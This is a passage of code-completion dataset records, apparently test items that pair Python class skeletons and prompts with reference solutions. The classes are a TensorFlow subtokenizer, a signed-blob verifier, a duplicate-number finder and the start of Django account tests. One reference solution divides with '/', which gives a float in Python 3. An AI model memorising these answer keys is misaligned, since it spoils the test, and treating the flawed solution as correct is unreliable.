tf.io.gfile.exists(vocab_file):\n tf.compat.v1.logging.info('Vocab file already exists (%s)' % vocab_file)\n else:\n tf.compat.v1.logging.info('Begin steps to create subtoken vocabulary...')\n token_counts = _count_tokens(files, file_byte_limit)\n alphabet = _generate_alphabet_dict(token_counts)\n subtoken_list = _generate_subtokens_with_target_vocab_size(token_counts, alphabet, target_vocab_size, threshold, min_count, reserved_tokens)\n tf.compat.v1.logging.info('Generated vocabulary with %d subtokens.' 
% len(subtoken_list))\n mlperf_log.transformer_print(key=mlperf_log.PREPROC_VOCAB_SIZE, value=len(subtoken_list))\n _save_vocab_file(vocab_file, subtoken_list)\n return Subtokenizer(vocab_file)\n<|end_body_1|>\n\n<|body_start_2|>\n ret = []\n tokens = _split_string_to_tokens(_native_to_unicode(raw_string))\n for token in tokens:\n ret.extend(self._token_to_subtoken_ids(token))\n if add_eos:\n ret.append(EOS_ID)\n return ret\n<|end_body_2|>\n\n<|body_start_3|>\n cache_location = hash(token) % self._cache_size\n cache_key, cache_value = self._cache[cache_location]\n if cache_key == token:\n return cache_value\n ret = _split_token_to_subtokens(_escape_token(token, self.alphabet), self.subtoken_to_id_dict, self.max_subtoken_length)\n ret = [self.subtoken_to_id_dict[subtoken_id] for subtoken_id in ret]\n self._cache[cache_location] = (token, ret)\n return ret\n<|end_body_3|>\n\n<|body_start_4|>\n if isinstance(subtokens, np.ndarray):\n subtokens = subtokens.tolist()\n if not subtokens:\n return ''\n assert isinstance(subtokens, list) and isinstance(subtokens[0], int), 'Subtokens argument passed into decode() must be a list of integers.'\n return _unicode_to_native(_join_tokens_to_string(self._subtoken_ids_to_tokens(subtokens)))\n<|end_body_4|>\n\n<|body_start_5|>\n escaped_tokens = ''.join([self.subtoken_list[s] for s in subtokens if s < len(self.subtoken_list)])\n escaped_tokens = escaped_tokens.split('_')\n ret = []\n for token in escaped_tokens:\n if token:\n ret.append(_unescape_token(token))\n return ret\n<|end_body_5|>\n", "revision_id": "9304c9f59fde013f158ac338fc80171c0e8cda5d", "skeleton": "<|skeleton|>\nclass Subtokenizer:\n \"\"\"Encodes and decodes strings to/from integer IDs.\"\"\"\n\n def __init__(self, vocab_file, reserved_tokens=None):\n \"\"\"Initializes class, creating a vocab file if data_files is provided.\"\"\"\n <|body_0|>\n\n def init_from_files(vocab_file, files, target_vocab_size, threshold, min_count=None, file_byte_limit=1000000.0, reserved_tokens=None):\n \"\"\"Create subtoken vocabulary based on files, and save vocab to file. Args: vocab_file: String name of vocab file to store subtoken vocabulary. files: List of file paths that will be used to generate vocabulary. target_vocab_size: target vocabulary size to generate. threshold: int threshold of vocabulary size to accept. min_count: int minimum count to use for generating the vocabulary. The min count is the minimum number of times a subtoken should appear in the files before it is added to the vocabulary. If set to none, this value is found using binary search. file_byte_limit: (Default 1e6) Maximum number of bytes of sample text that will be drawn from the files. 
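
The vocabulary code above leans on a `_split_token_to_subtokens(escaped_token, vocab, max_subtoken_length)` helper that is referenced but never defined in this record. A plausible stand-in, assuming the greedy longest-match ("max munch") strategy this family of tokenizers typically uses — the helper's exact behavior is an assumption, not the record's code:

```python
# Hypothetical stand-in for the undefined _split_token_to_subtokens helper:
# greedy longest-match splitting, bounded by the longest vocabulary entry.
def split_token_to_subtokens(token, vocab, max_subtoken_length):
    subtokens = []
    start = 0
    while start < len(token):
        # Try the longest candidate first so "able" beats "a" + "b" + ...
        for end in range(min(start + max_subtoken_length, len(token)), start, -1):
            candidate = token[start:end]
            if candidate in vocab:
                subtokens.append(candidate)
                start = end
                break
        else:
            raise ValueError("token contains characters outside the alphabet")
    return subtokens


vocab = {"un", "break", "able", "u", "n", "b"}
assert split_token_to_subtokens("unbreakable", vocab, 5) == ["un", "break", "able"]
```

Capping the scan at `max_subtoken_length` is what makes precomputing that bound in `__init__` worthwhile: each position tries at most that many candidates instead of every remaining suffix.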
reserved_tokens: List of string\"\"\"\n <|body_1|>\n\n def encode(self, raw_string, add_eos=False):\n \"\"\"Encodes a string into a list of int subtoken ids.\"\"\"\n <|body_2|>\n\n def _token_to_subtoken_ids(self, token):\n \"\"\"Encode a single token into a list of subtoken ids.\"\"\"\n <|body_3|>\n\n def decode(self, subtokens):\n \"\"\"Converts list of int subtokens ids into a string.\"\"\"\n <|body_4|>\n\n def _subtoken_ids_to_tokens(self, subtokens):\n \"\"\"Convert list of int subtoken ids to a list of string tokens.\"\"\"\n <|body_5|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Subtokenizer:\n \"\"\"Encodes and decodes strings to/from integer IDs.\"\"\"\n\n def __init__(self, vocab_file, reserved_tokens=None):\n \"\"\"Initializes class, creating a vocab file if data_files is provided.\"\"\"\n tf.compat.v1.logging.info('Initializing Subtokenizer from file %s.' % vocab_file)\n if reserved_tokens is None:\n reserved_tokens = RESERVED_TOKENS\n self.subtoken_list = _load_vocab_file(vocab_file, reserved_tokens)\n self.alphabet = _generate_alphabet_dict(self.subtoken_list)\n self.subtoken_to_id_dict = _list_to_index_dict(self.subtoken_list)\n self.max_subtoken_length = 0\n for subtoken in self.subtoken_list:\n self.max_subtoken_length = max(self.max_subtoken_length, len(subtoken))\n self._cache_size = 2 ** 20\n self._cache = [(None, None)] * self._cache_size\n\n def init_from_files(vocab_file, files, target_vocab_size, threshold, min_count=None, file_byte_limit=1000000.0, reserved_tokens=None):\n \"\"\"Create subtoken vocabulary based on files, and save vocab to file. Args: vocab_file: String name of vocab file to store subtoken vocabulary. files: List of file paths that will be used to generate vocabulary. target_vocab_size: target vocabulary size to generate. threshold: int threshold of vocabulary size to accept. min_count: int minimum count to use for generating the vocabulary. The min count is the minimum number of times a subtoken should appear in the files before it is added to the vocabulary. If set to none, this value is found using binary search. file_byte_limit: (Default 1e6) Maximum number of bytes of sample text that will be drawn from the files. reserved_tokens: List of string\"\"\"\n if reserved_tokens is None:\n reserved_tokens = RESERVED_TOKENS\n if tf.io.gfile.exists(vocab_file):\n tf.compat.v1.logging.info('Vocab file already exists (%s)' % vocab_file)\n else:\n tf.compat.v1.logging.info('Begin steps to create subtoken vocabulary...')\n token_counts = _count_tokens(files, file_byte_limit)\n alphabet = _generate_alphabet_dict(token_counts)\n subtoken_list = _generate_subtokens_with_target_vocab_size(token_counts, alphabet, target_vocab_size, threshold, min_count, reserved_tokens)\n tf.compat.v1.logging.info('Generated vocabulary with %d subtokens.' 
% len(subtoken_list))\n mlperf_log.transformer_print(key=mlperf_log.PREPROC_VOCAB_SIZE, value=len(subtoken_list))\n _save_vocab_file(vocab_file, subtoken_list)\n return Subtokenizer(vocab_file)\n\n def encode(self, raw_string, add_eos=False):\n \"\"\"Encodes a string into a list of int subtoken ids.\"\"\"\n ret = []\n tokens = _split_string_to_tokens(_native_to_unicode(raw_string))\n for token in tokens:\n ret.extend(self._token_to_subtoken_ids(token))\n if add_eos:\n ret.append(EOS_ID)\n return ret\n\n def _token_to_subtoken_ids(self, token):\n \"\"\"Encode a single token into a list of subtoken ids.\"\"\"\n cache_location = hash(token) % self._cache_size\n cache_key, cache_value = self._cache[cache_location]\n if cache_key == token:\n return cache_value\n ret = _split_token_to_subtokens(_escape_token(token, self.alphabet), self.subtoken_to_id_dict, self.max_subtoken_length)\n ret = [self.subtoken_to_id_dict[subtoken_id] for subtoken_id in ret]\n self._cache[cache_location] = (token, ret)\n return ret\n\n def decode(self, subtokens):\n \"\"\"Converts list of int subtokens ids into a string.\"\"\"\n if isinstance(subtokens, np.ndarray):\n subtokens = subtokens.tolist()\n if not subtokens:\n return ''\n assert isinstance(subtokens, list) and isinstance(subtokens[0], int), 'Subtokens argument passed into decode() must be a list of integers.'\n return _unicode_to_native(_join_tokens_to_string(self._subtoken_ids_to_tokens(subtokens)))\n\n def _subtoken_ids_to_tokens(self, subtokens):\n \"\"\"Convert list of int subtoken ids to a list of string tokens.\"\"\"\n escaped_tokens = ''.join([self.subtoken_list[s] for s in subtokens if s < len(self.subtoken_list)])\n escaped_tokens = escaped_tokens.split('_')\n ret = []\n for token in escaped_tokens:\n if token:\n ret.append(_unescape_token(token))\n return ret\n", "source": "the_stack_v2_python_sparse", "source_path": "models/language_translation/tensorflow/transformer_mlperf/inference/int8/transformer/utils/tokenizer.py", "source_repo": "IntelAI/models", "split": "test", "star_events_count": 609} {"blob_id": "1c5724bfeb53cfef03c0cda0597e418e2fd95925", "bodies": ["if self.digest_type != self.HashType.SHA256:\n raise rdfvalue.DecodeError('Unsupported digest.')\nif self.signature_type not in [self.SignatureType.RSA_PKCS1v15, self.SignatureType.RSA_PSS]:\n raise rdfvalue.DecodeError('Unsupported signature type.')\ntry:\n public_key.Verify(self.data, self.signature)\nexcept InvalidSignature as e:\n raise rdfvalue.DecodeError('Could not verify blob. Error: %s' % e)\nreturn True", "if signing_key.KeyLen() < 2048:\n logging.warning('signing key is too short.')\nself.signature = signing_key.Sign(data)\nself.signature_type = self.SignatureType.RSA_PKCS1v15\nself.digest = hashlib.sha256(data).digest()\nself.digest_type = self.HashType.SHA256\nself.data = data\nif verify_key is None:\n verify_key = signing_key.GetPublicKey()\nself.Verify(verify_key)\nreturn self"], "bodies_text": "<|body_start_0|>\n if self.digest_type != self.HashType.SHA256:\n raise rdfvalue.DecodeError('Unsupported digest.')\n if self.signature_type not in [self.SignatureType.RSA_PKCS1v15, self.SignatureType.RSA_PSS]:\n raise rdfvalue.DecodeError('Unsupported signature type.')\n try:\n public_key.Verify(self.data, self.signature)\n except InvalidSignature as e:\n raise rdfvalue.DecodeError('Could not verify blob. 
Error: %s' % e)\n return True\n<|end_body_0|>\n\n<|body_start_1|>\n if signing_key.KeyLen() < 2048:\n logging.warning('signing key is too short.')\n self.signature = signing_key.Sign(data)\n self.signature_type = self.SignatureType.RSA_PKCS1v15\n self.digest = hashlib.sha256(data).digest()\n self.digest_type = self.HashType.SHA256\n self.data = data\n if verify_key is None:\n verify_key = signing_key.GetPublicKey()\n self.Verify(verify_key)\n return self\n<|end_body_1|>\n", "class_docstring": "A signed blob. The client can receive and verify a signed blob (e.g. driver or executable binary). Once verified, the client may execute this.", "class_name": "SignedBlob", "detected_licenses": ["Apache-2.0"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass SignedBlob:\n \"\"\"A signed blob. The client can receive and verify a signed blob (e.g. driver or executable binary). Once verified, the client may execute this.\"\"\"\n\n def Verify(self, public_key):\n \"\"\"Verify the data in this blob. Args: public_key: The public key to use for verification. Returns: True when verification succeeds. Raises: rdfvalue.DecodeError if the data is not suitable verified.\"\"\"\n <|body_0|>\n\n def Sign(self, data, signing_key, verify_key=None):\n \"\"\"Use the data to sign this blob. Args: data: String containing the blob data. signing_key: The key to sign with. verify_key: Key to verify with. If None we assume the signing key also contains the public key. Returns: self for call chaining.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if self.digest_type != self.HashType.SHA256:\n raise rdfvalue.DecodeError('Unsupported digest.')\n if self.signature_type not in [self.SignatureType.RSA_PKCS1v15, self.SignatureType.RSA_PSS]:\n raise rdfvalue.DecodeError('Unsupported signature type.')\n try:\n public_key.Verify(self.data, self.signature)\n except InvalidSignature as e:\n raise rdfvalue.DecodeError('Could not verify blob. Error: %s' % e)\n return True\n<|end_body_0|>\n\n<|body_start_1|>\n if signing_key.KeyLen() < 2048:\n logging.warning('signing key is too short.')\n self.signature = signing_key.Sign(data)\n self.signature_type = self.SignatureType.RSA_PKCS1v15\n self.digest = hashlib.sha256(data).digest()\n self.digest_type = self.HashType.SHA256\n self.data = data\n if verify_key is None:\n verify_key = signing_key.GetPublicKey()\n self.Verify(verify_key)\n return self\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000434", "length_bytes": 27541, "license_type": "permissive", "methods": [{"docstring": "Verify the data in this blob. Args: public_key: The public key to use for verification. Returns: True when verification succeeds. Raises: rdfvalue.DecodeError if the data is not suitable verified.", "name": "Verify", "signature": "def Verify(self, public_key)"}, {"docstring": "Use the data to sign this blob. Args: data: String containing the blob data. signing_key: The key to sign with. verify_key: Key to verify with. If None we assume the signing key also contains the public key. Returns: self for call chaining.", "name": "Sign", "signature": "def Sign(self, data, signing_key, verify_key=None)"}], "n_methods": 2, "prompt": "Implement the Python class `SignedBlob` described below.\n\nClass description:\nA signed blob. The client can receive and verify a signed blob (e.g. driver or executable binary). Once verified, the client may execute this.\n\nMethod signatures and docstrings:\n- def Verify(self, public_key): Verify the data in this blob. 
Args: public_key: The public key to use for verification. Returns: True when verification succeeds. Raises: rdfvalue.DecodeError if the data is not suitable verified.\n- def Sign(self, data, signing_key, verify_key=None): Use the data to sign this blob. Args: data: String containing the blob data. signing_key: The key to sign with. verify_key: Key to verify with. If None we assume the signing key also contains the public key. Returns: self for call chaining.", "prompted_full_text": "Implement the Python class `SignedBlob` described below.\n\nClass description:\nA signed blob. The client can receive and verify a signed blob (e.g. driver or executable binary). Once verified, the client may execute this.\n\nMethod signatures and docstrings:\n- def Verify(self, public_key): Verify the data in this blob. Args: public_key: The public key to use for verification. Returns: True when verification succeeds. Raises: rdfvalue.DecodeError if the data is not suitable verified.\n- def Sign(self, data, signing_key, verify_key=None): Use the data to sign this blob. Args: data: String containing the blob data. signing_key: The key to sign with. verify_key: Key to verify with. If None we assume the signing key also contains the public key. Returns: self for call chaining.\n\n<|skeleton|>\nclass SignedBlob:\n \"\"\"A signed blob. The client can receive and verify a signed blob (e.g. driver or executable binary). Once verified, the client may execute this.\"\"\"\n\n def Verify(self, public_key):\n \"\"\"Verify the data in this blob. Args: public_key: The public key to use for verification. Returns: True when verification succeeds. Raises: rdfvalue.DecodeError if the data is not suitable verified.\"\"\"\n <|body_0|>\n\n def Sign(self, data, signing_key, verify_key=None):\n \"\"\"Use the data to sign this blob. Args: data: String containing the blob data. signing_key: The key to sign with. verify_key: Key to verify with. If None we assume the signing key also contains the public key. Returns: self for call chaining.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if self.digest_type != self.HashType.SHA256:\n raise rdfvalue.DecodeError('Unsupported digest.')\n if self.signature_type not in [self.SignatureType.RSA_PKCS1v15, self.SignatureType.RSA_PSS]:\n raise rdfvalue.DecodeError('Unsupported signature type.')\n try:\n public_key.Verify(self.data, self.signature)\n except InvalidSignature as e:\n raise rdfvalue.DecodeError('Could not verify blob. Error: %s' % e)\n return True\n<|end_body_0|>\n\n<|body_start_1|>\n if signing_key.KeyLen() < 2048:\n logging.warning('signing key is too short.')\n self.signature = signing_key.Sign(data)\n self.signature_type = self.SignatureType.RSA_PKCS1v15\n self.digest = hashlib.sha256(data).digest()\n self.digest_type = self.HashType.SHA256\n self.data = data\n if verify_key is None:\n verify_key = signing_key.GetPublicKey()\n self.Verify(verify_key)\n return self\n<|end_body_1|>\n", "revision_id": "44c0eb8c938302098ef7efae8cfd6b90bcfbb2d6", "skeleton": "<|skeleton|>\nclass SignedBlob:\n \"\"\"A signed blob. The client can receive and verify a signed blob (e.g. driver or executable binary). Once verified, the client may execute this.\"\"\"\n\n def Verify(self, public_key):\n \"\"\"Verify the data in this blob. Args: public_key: The public key to use for verification. Returns: True when verification succeeds. 
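
The `Sign`/`Verify` bodies above delegate to key-object methods (`signing_key.Sign`, `public_key.Verify`) whose implementations live elsewhere in the codebase. A self-contained sketch of the same flow — RSA PKCS#1 v1.5 over a SHA-256 digest — using the `cryptography` package directly (the record's own wrappers may differ):

```python
import hashlib

from cryptography.exceptions import InvalidSignature
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.asymmetric import padding, rsa

data = b"driver or executable binary"

# 2048 bits matches the minimum the record's Sign() warns about.
private_key = rsa.generate_private_key(public_exponent=65537, key_size=2048)

signature = private_key.sign(data, padding.PKCS1v15(), hashes.SHA256())
digest = hashlib.sha256(data).digest()  # stored alongside, as in the record

try:
    private_key.public_key().verify(
        signature, data, padding.PKCS1v15(), hashes.SHA256())
except InvalidSignature as e:
    raise ValueError("Could not verify blob. Error: %s" % e)
```

Signing and then immediately verifying against the public half, as `Sign()` does, catches a corrupted or mismatched key pair at signing time rather than on the client.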
Raises: rdfvalue.DecodeError if the data is not suitable verified.\"\"\"\n <|body_0|>\n\n def Sign(self, data, signing_key, verify_key=None):\n \"\"\"Use the data to sign this blob. Args: data: String containing the blob data. signing_key: The key to sign with. verify_key: Key to verify with. If None we assume the signing key also contains the public key. Returns: self for call chaining.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class SignedBlob:\n \"\"\"A signed blob. The client can receive and verify a signed blob (e.g. driver or executable binary). Once verified, the client may execute this.\"\"\"\n\n def Verify(self, public_key):\n \"\"\"Verify the data in this blob. Args: public_key: The public key to use for verification. Returns: True when verification succeeds. Raises: rdfvalue.DecodeError if the data is not suitable verified.\"\"\"\n if self.digest_type != self.HashType.SHA256:\n raise rdfvalue.DecodeError('Unsupported digest.')\n if self.signature_type not in [self.SignatureType.RSA_PKCS1v15, self.SignatureType.RSA_PSS]:\n raise rdfvalue.DecodeError('Unsupported signature type.')\n try:\n public_key.Verify(self.data, self.signature)\n except InvalidSignature as e:\n raise rdfvalue.DecodeError('Could not verify blob. Error: %s' % e)\n return True\n\n def Sign(self, data, signing_key, verify_key=None):\n \"\"\"Use the data to sign this blob. Args: data: String containing the blob data. signing_key: The key to sign with. verify_key: Key to verify with. If None we assume the signing key also contains the public key. Returns: self for call chaining.\"\"\"\n if signing_key.KeyLen() < 2048:\n logging.warning('signing key is too short.')\n self.signature = signing_key.Sign(data)\n self.signature_type = self.SignatureType.RSA_PKCS1v15\n self.digest = hashlib.sha256(data).digest()\n self.digest_type = self.HashType.SHA256\n self.data = data\n if verify_key is None:\n verify_key = signing_key.GetPublicKey()\n self.Verify(verify_key)\n return self\n", "source": "the_stack_v2_python_sparse", "source_path": "grr/core/grr_response_core/lib/rdfvalues/crypto.py", "source_repo": "google/grr", "split": "test", "star_events_count": 4683} {"blob_id": "26e18ad67eca384933d7128193e1b72cb95fb89a", "bodies": ["for val in nums:\n val = abs(val)\n if nums[val - 1] < 0:\n return val\n else:\n nums[val - 1] = -nums[val - 1]\nraise ValueError", "head = 0\ntail = len(nums) - 1\nwhile head < tail:\n mid = (tail - head) / 2 + head\n count = 0\n for num in nums:\n if num <= mid:\n count += 1\n if count > mid:\n tail = mid\n else:\n head = mid + 1\nreturn head"], "bodies_text": "<|body_start_0|>\n for val in nums:\n val = abs(val)\n if nums[val - 1] < 0:\n return val\n else:\n nums[val - 1] = -nums[val - 1]\n raise ValueError\n<|end_body_0|>\n\n<|body_start_1|>\n head = 0\n tail = len(nums) - 1\n while head < tail:\n mid = (tail - head) / 2 + head\n count = 0\n for num in nums:\n if num <= mid:\n count += 1\n if count > mid:\n tail = mid\n else:\n head = mid + 1\n return head\n<|end_body_1|>\n", "class_docstring": "", "class_name": "Solution", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Solution:\n\n def findDuplicate(self, nums):\n \"\"\"Since the element range will fit in the arr index range, and all value are positive, we can use the convert the value from positive to negative and negative value indicates that this index as a 
elemeng is seen already. Usually then asked for space complexity O(1), you need to modify the arr or matrix and at the same time loose no entropy of it. :type nums: List[int] :rtype: int\"\"\"\n <|body_0|>\n\n def findDuplicateBinarySearch(self, nums):\n \"\"\"Binary search with no extra space. For index mid, which mapps to number mid + 1, count how many numbers in this array are smaller than mid + 1(<= mid). If counter is larger than mid(count >= mid + 1), that means duplicate one is larger than mid. Note that this this case the index is value.(index + 1 = value)\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n for val in nums:\n val = abs(val)\n if nums[val - 1] < 0:\n return val\n else:\n nums[val - 1] = -nums[val - 1]\n raise ValueError\n<|end_body_0|>\n\n<|body_start_1|>\n head = 0\n tail = len(nums) - 1\n while head < tail:\n mid = (tail - head) / 2 + head\n count = 0\n for num in nums:\n if num <= mid:\n count += 1\n if count > mid:\n tail = mid\n else:\n head = mid + 1\n return head\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000435", "length_bytes": 2401, "license_type": "no_license", "methods": [{"docstring": "Since the element range will fit in the arr index range, and all value are positive, we can use the convert the value from positive to negative and negative value indicates that this index as a elemeng is seen already. Usually then asked for space complexity O(1), you need to modify the arr or matrix and at the same time loose no entropy of it. :type nums: List[int] :rtype: int", "name": "findDuplicate", "signature": "def findDuplicate(self, nums)"}, {"docstring": "Binary search with no extra space. For index mid, which mapps to number mid + 1, count how many numbers in this array are smaller than mid + 1(<= mid). If counter is larger than mid(count >= mid + 1), that means duplicate one is larger than mid. Note that this this case the index is value.(index + 1 = value)", "name": "findDuplicateBinarySearch", "signature": "def findDuplicateBinarySearch(self, nums)"}], "n_methods": 2, "prompt": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def findDuplicate(self, nums): Since the element range will fit in the arr index range, and all value are positive, we can use the convert the value from positive to negative and negative value indicates that this index as a elemeng is seen already. Usually then asked for space complexity O(1), you need to modify the arr or matrix and at the same time loose no entropy of it. :type nums: List[int] :rtype: int\n- def findDuplicateBinarySearch(self, nums): Binary search with no extra space. For index mid, which mapps to number mid + 1, count how many numbers in this array are smaller than mid + 1(<= mid). If counter is larger than mid(count >= mid + 1), that means duplicate one is larger than mid. Note that this this case the index is value.(index + 1 = value)", "prompted_full_text": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def findDuplicate(self, nums): Since the element range will fit in the arr index range, and all value are positive, we can use the convert the value from positive to negative and negative value indicates that this index as a elemeng is seen already. Usually then asked for space complexity O(1), you need to modify the arr or matrix and at the same time loose no entropy of it. 
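
The sign-flip approach works because every value `v` in `nums` is a valid index `v - 1`; finding that slot already negative means `v` was seen before (the docstring's "elemeng" and "loose" should read "element" and "lose"). A quick worked run:

```python
def find_duplicate(nums):
    # Flip the sign at index (value - 1); a second visit finds it negative.
    for val in nums:
        val = abs(val)  # earlier flips may have negated this entry in place
        if nums[val - 1] < 0:
            return val
        nums[val - 1] = -nums[val - 1]
    raise ValueError("no duplicate found")


nums = [1, 3, 4, 2, 2]
# 1 -> flip idx 0; 3 -> flip idx 2; 4 -> flip idx 3; 2 -> flip idx 1;
# 2 again -> idx 1 is already negative, so 2 is the duplicate.
assert find_duplicate(nums) == 2
```

As the docstring notes, the O(1)-space price is mutating the input: the array's signs are scrambled after the call.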
:type nums: List[int] :rtype: int\n- def findDuplicateBinarySearch(self, nums): Binary search with no extra space. For index mid, which mapps to number mid + 1, count how many numbers in this array are smaller than mid + 1(<= mid). If counter is larger than mid(count >= mid + 1), that means duplicate one is larger than mid. Note that this this case the index is value.(index + 1 = value)\n\n<|skeleton|>\nclass Solution:\n\n def findDuplicate(self, nums):\n \"\"\"Since the element range will fit in the arr index range, and all value are positive, we can use the convert the value from positive to negative and negative value indicates that this index as a elemeng is seen already. Usually then asked for space complexity O(1), you need to modify the arr or matrix and at the same time loose no entropy of it. :type nums: List[int] :rtype: int\"\"\"\n <|body_0|>\n\n def findDuplicateBinarySearch(self, nums):\n \"\"\"Binary search with no extra space. For index mid, which mapps to number mid + 1, count how many numbers in this array are smaller than mid + 1(<= mid). If counter is larger than mid(count >= mid + 1), that means duplicate one is larger than mid. Note that this this case the index is value.(index + 1 = value)\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n for val in nums:\n val = abs(val)\n if nums[val - 1] < 0:\n return val\n else:\n nums[val - 1] = -nums[val - 1]\n raise ValueError\n<|end_body_0|>\n\n<|body_start_1|>\n head = 0\n tail = len(nums) - 1\n while head < tail:\n mid = (tail - head) / 2 + head\n count = 0\n for num in nums:\n if num <= mid:\n count += 1\n if count > mid:\n tail = mid\n else:\n head = mid + 1\n return head\n<|end_body_1|>\n", "revision_id": "33c623f226981942780751554f0593f2c71cf458", "skeleton": "<|skeleton|>\nclass Solution:\n\n def findDuplicate(self, nums):\n \"\"\"Since the element range will fit in the arr index range, and all value are positive, we can use the convert the value from positive to negative and negative value indicates that this index as a elemeng is seen already. Usually then asked for space complexity O(1), you need to modify the arr or matrix and at the same time loose no entropy of it. :type nums: List[int] :rtype: int\"\"\"\n <|body_0|>\n\n def findDuplicateBinarySearch(self, nums):\n \"\"\"Binary search with no extra space. For index mid, which mapps to number mid + 1, count how many numbers in this array are smaller than mid + 1(<= mid). If counter is larger than mid(count >= mid + 1), that means duplicate one is larger than mid. Note that this this case the index is value.(index + 1 = value)\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Solution:\n def findDuplicate(self, nums):\n \"\"\"Since the element range will fit in the arr index range, and all value are positive, we can use the convert the value from positive to negative and negative value indicates that this index as a elemeng is seen already. Usually then asked for space complexity O(1), you need to modify the arr or matrix and at the same time loose no entropy of it. :type nums: List[int] :rtype: int\"\"\"\n for val in nums:\n val = abs(val)\n if nums[val - 1] < 0:\n return val\n else:\n nums[val - 1] = -nums[val - 1]\n raise ValueError\n\n def findDuplicateBinarySearch(self, nums):\n \"\"\"Binary search with no extra space. For index mid, which mapps to number mid + 1, count how many numbers in this array are smaller than mid + 1(<= mid). 
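
As transcribed, `findDuplicateBinarySearch` computes `mid = (tail - head) / 2 + head`, which yields a float under Python 3 and then breaks the index arithmetic; the original was presumably Python 2 (the docstring's "mapps" and "this this case" should read "maps" and "in this case"). A Python-3-safe sketch of the same counting binary search — O(n log n) time, O(1) extra space, input left unmodified:

```python
def find_duplicate_binary_search(nums):
    head, tail = 1, len(nums) - 1  # candidate *values* 1..n, not indices
    while head < tail:
        mid = (head + tail) // 2   # integer division; `/` would yield a float
        # If more than `mid` values are <= mid, by pigeonhole the duplicate
        # lies in [head, mid]; otherwise it lies in [mid + 1, tail].
        count = sum(1 for num in nums if num <= mid)
        if count > mid:
            tail = mid
        else:
            head = mid + 1
    return head


assert find_duplicate_binary_search([1, 3, 4, 2, 2]) == 2
```

Starting `head` at 1 rather than the record's 0 is a harmless normalization: `count(<= 0)` is always 0, so 0 can never win the search anyway.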
If counter is larger than mid(count >= mid + 1), that means duplicate one is larger than mid. Note that this this case the index is value.(index + 1 = value)\"\"\"\n head = 0\n tail = len(nums) - 1\n while head < tail:\n mid = (tail - head) / 2 + head\n count = 0\n for num in nums:\n if num <= mid:\n count += 1\n if count > mid:\n tail = mid\n else:\n head = mid + 1\n return head\n", "source": "the_stack_v2_python_sparse", "source_path": "search/leetcode_Find_The_Duplicate_Number.py", "source_repo": "monkeylyf/interviewjam", "split": "test", "star_events_count": 59} {"blob_id": "caeaf1d808ac9917645b985392db23e63befdf42", "bodies": ["url = reverse('user-account-detail', args=[self.username])\nself.token_login()\nrequest = self.c.get(path=url, content_type='application/json', **self.client_header)\nself.assertEqual(request.status_code, status.HTTP_200_OK)", "url = reverse('user-account-detail', args=['hededsfd'])\nself.token_login()\nrequest = self.c.get(path=url, content_type='application/json', **self.client_header)\nself.assertEqual(request.status_code, status.HTTP_404_NOT_FOUND)", "url = reverse('user-account-detail', args=[self.username])\nself.token_login()\nrequest = self.c.delete(path=url, content_type='application/json', **self.client_header)\nself.assertEqual(request.status_code, status.HTTP_204_NO_CONTENT)", "user = User.objects.create_user(username='hede', password='hede')\nurl = reverse('user-account-detail', args=[user.username])\nself.token_login()\nrequest = self.c.delete(path=url, content_type='application/json', **self.client_header)\nself.assertEqual(request.status_code, status.HTTP_403_FORBIDDEN)", "url = reverse('user-account-detail', args=[self.username])\nself.token_login()\ndata = UserDetailSerializer(instance=self.u).data\ndata['gender'] = User.MALE\ndata.pop('background')\ndata.pop('avatar')\nrequest = self.c.put(path=url, data=simplejson.dumps(data), content_type='application/json', **self.client_header)\nself.assertEqual(request.status_code, status.HTTP_200_OK)\nself.assertEqual(data['gender'], User.objects.get(username=self.username).gender)", "url = reverse('user-change-password', args=[self.username])\nself.token_login()\ndata = {'password': self.password, 'new_password': 'testtest', 'confirm_password': 'testtest'}\nrequest = self.c.patch(url, data=simplejson.dumps(data), content_type='application/json', **self.client_header)\nself.assertEqual(request.status_code, status.HTTP_200_OK)\nnew_user = User.objects.get(username=self.username)\nself.assertNotEqual(self.u.password, new_user.password)"], "bodies_text": "<|body_start_0|>\n url = reverse('user-account-detail', args=[self.username])\n self.token_login()\n request = self.c.get(path=url, content_type='application/json', **self.client_header)\n self.assertEqual(request.status_code, status.HTTP_200_OK)\n<|end_body_0|>\n\n<|body_start_1|>\n url = reverse('user-account-detail', args=['hededsfd'])\n self.token_login()\n request = self.c.get(path=url, content_type='application/json', **self.client_header)\n self.assertEqual(request.status_code, status.HTTP_404_NOT_FOUND)\n<|end_body_1|>\n\n<|body_start_2|>\n url = reverse('user-account-detail', args=[self.username])\n self.token_login()\n request = self.c.delete(path=url, content_type='application/json', **self.client_header)\n self.assertEqual(request.status_code, status.HTTP_204_NO_CONTENT)\n<|end_body_2|>\n\n<|body_start_3|>\n user = User.objects.create_user(username='hede', password='hede')\n url = reverse('user-account-detail', args=[user.username])\n 
